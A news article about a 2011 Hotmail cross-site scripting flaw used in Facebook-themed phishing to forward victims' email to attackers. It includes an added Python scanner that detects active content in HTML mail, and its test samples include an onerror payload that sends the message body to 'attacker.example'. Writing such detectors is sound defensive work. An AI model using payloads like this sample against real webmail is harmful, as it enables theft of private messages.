A security flaw in Microsoft's Hotmail left private emails open to theft for a full week, researchers at the security firm Trend Micro reported.
Attackers exploited the Hotmail flaw by sending malicious emails to Hotmail users telling them that someone had logged into their Facebook account "from a computer or device or from a location that you have never used before," Trend Micro wrote on May 13, when it discovered the attack.
The scam message also said that in order to "confirm your account is not hacked, we temporarily locked down your account."
Unlike similar phishing scams that rely on scaring users into clicking malicious links (including a recent one themed around the iPhone 5), this attack required no click at all: the script embedded in the message ran as soon as the victim opened it in Hotmail. The page calls this a "drive-by download," but that label is loose. Nothing was downloaded or installed on the computer; the flaw lay in Hotmail itself, which rendered the attacker's script inside the logged-in webmail session instead of stripping it, which is a cross-site scripting (XSS) weakness rather than a malware infection.
Once the script ran, it read the victim's Hotmail messages and forwarded them to an email address the attacker controlled, with no further action from the user.
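The attack worked because active content in a message body was rendered rather than stripped. The following scanner is an added example, not code from the original article or from Trend Micro: it walks an HTML email body with Python's standard-library parser and flags every construct that would execute on view (script elements, `on*` event handlers, `javascript:` URLs, and CSS `expression()`), normalizing away the whitespace and entity tricks used to slip past naive filters. The sample messages, the `attacker.example` host and the `scan_html` helper are constructed for illustration; the exact markup used in the 2011 attack is not reproduced here.

```python
"""Flag HTML e-mail bodies that carry content which runs as soon as the message is viewed.

Added example (not from the article or Trend Micro). Sample messages below are
constructed; they are not the real 2011 phishing mails.
"""
from html.parser import HTMLParser
from typing import List, Tuple

# Elements that execute code or pull in remote active content when rendered.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
# Attributes whose value is interpreted as a URL.
URL_ATTRS = {"href", "src", "action", "data", "formaction"}


def _normalize(value: str) -> str:
    # Browsers ignore whitespace and control characters inside a URL scheme,
    # so "java\nscript:" still runs; strip them before matching.
    return "".join(c for c in value if not c.isspace() and ord(c) > 31).lower()


class ActiveContentScanner(HTMLParser):
    """Collect (kind, location) findings for every construct that runs on view."""

    def __init__(self) -> None:
        # convert_charrefs=True (default) decodes entity-encoded attribute values,
        # so "java&#10;script:" is seen after decoding, as a browser would see it.
        super().__init__()
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-tag", tag))
        for name, raw in attrs:
            value = _normalize(raw or "")
            if name.startswith("on"):
                # Event handler: fires without a click, e.g. onerror on a broken image.
                self.findings.append(("event-handler", f"{tag}@{name}"))
            elif name in URL_ATTRS and value.startswith(("javascript:", "vbscript:")):
                self.findings.append(("script-url", f"{tag}@{name}"))
            elif name == "style" and ("expression(" in value or "javascript:" in value):
                # Legacy IE evaluated CSS expression() as script.
                self.findings.append(("active-style", f"{tag}@{name}"))


def scan_html(body: str) -> List[Tuple[str, str]]:
    """Return a list of (finding kind, tag@attribute) for active content in body."""
    scanner = ActiveContentScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed samples for the example.
BENIGN = '<p>Your order shipped. <a href="https://example.com/track">Track it</a></p>'
LURE = (
    "<p>Someone logged into your Facebook account from a computer or device or "
    "from a location that you have never used before. To confirm your account "
    "is not hacked, we temporarily locked down your account.</p>"
    # Fires as soon as the message is rendered; no click needed.
    '<img src="x" onerror="new Image().src=\'https://attacker.example/?m=\'+encodeURIComponent(document.body.innerHTML)">'
)
OBFUSCATED = '<a href="java&#10;script:alert(1)">Unlock account</a>'
STYLE_EXPR = '<div style="width: expression(alert(1))">hi</div>'

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("lure", LURE),
                        ("obfuscated", OBFUSCATED), ("style", STYLE_EXPR)]:
        print(label, scan_html(body))
```

This is a detection check, not a sanitizer: a webmail client that renders HTML still needs a real allowlist-based sanitizer, and a message that trips any of these findings should be rendered as plain text or held for review rather than displayed as-is.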
The Hotmail flaw remained exploitable until Microsoft patched it last Friday (May 20), a Trend Micro researcher told Computerworld. The researcher said Trend Micro does not know how long the flaw had existed before the company discovered it.